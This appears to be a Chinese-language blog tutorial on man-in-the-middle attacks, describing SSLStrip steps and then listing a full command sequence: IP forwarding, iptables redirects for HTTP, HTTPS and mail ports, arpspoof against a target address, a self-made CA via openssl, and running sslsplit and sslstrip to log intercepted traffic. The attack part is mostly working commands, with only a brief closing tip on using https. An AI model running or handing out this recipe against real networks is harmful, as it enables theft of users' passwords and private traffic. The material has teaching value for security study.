中間人攻擊(Man-in-the-Middle Attack, MITM)是一種由來已久的網絡入侵手段,而且在今天仍然有着普遍的發展空間,如SMB會話劫持、DNS欺騙等攻擊都是典型的MITM攻擊。簡而言之,所謂的MITM攻擊就是經過攔截正常的網絡通訊數據,並進行數據篡改和嗅探,而通訊的雙方卻絕不知情。html
整個SSLStrip 過程包括以下幾個步驟:git
1. 客戶端Client向服務器Server發起HTTP鏈接請求 2. 中間人MITM監聽客戶端與服務器的HTTP數據; 3. 服務器返回給客戶端的HTTP數據包被在客戶端與服務器之間的中間人截獲。中間人解析原HTTP數據包,將HTTPS URL改成HTTP URL,同時記錄下所修改的URL,並保存; 4. 中間人將修改後的HTTP數據發送給客戶端; 5. 客戶端Client向服務器Server發起HTTP鏈接請求; 6. 中間人計算機解析客戶端的HTTP鏈接請求,並與保存文件相比較。當發現存在有已修改過的HTTP URL時,將其替換成原HTTPS URL,併發送給服務器;
結合arp地址欺騙,無需僞造證書github
echo 1 > /proc/sys/net/ipv4/ip_forward
,也能夠輸sysctl -w net.ipv4.ip_forward=1
iptables -t nat -L
查看nat表中的規則iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080 //HTTP iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443 //HTTPS iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 //MSA iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 //SMTPS iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 //IMAPS iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 //POP3S
arpspoof -i eth0 -t 192.168.19.133 -r 192.168.19.2
openssl genrsa -out ca.key 2048
openssl req -new -x509 -days 1096 -key ca.key -out ca.crt
git clone https://github.com/droe/sslsplit.git /opt/sslsplit
apt-get install libssl-dev libevent-dev
進行安裝make
make install
進行編譯。sslsplit -D -l connect.log -j /root/test -S logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
sslstrip –l 8080
監聽發往8080端口的數據中間人攻擊是較爲隱蔽的社會學攻擊,中間人攻擊會使用戶以爲可能只是網絡很差使得網頁加載緩慢或須要刷新,若是用戶沒有注意到使用的是http協議或者沒有注意到證書的問題,就可能被截取用戶名和口令。所以,在平常生活中,對一些網銀、購物、郵箱等網站要養成手動輸入https協議的習慣,多注意細節,就能儘量避免被攻擊。瀏覽器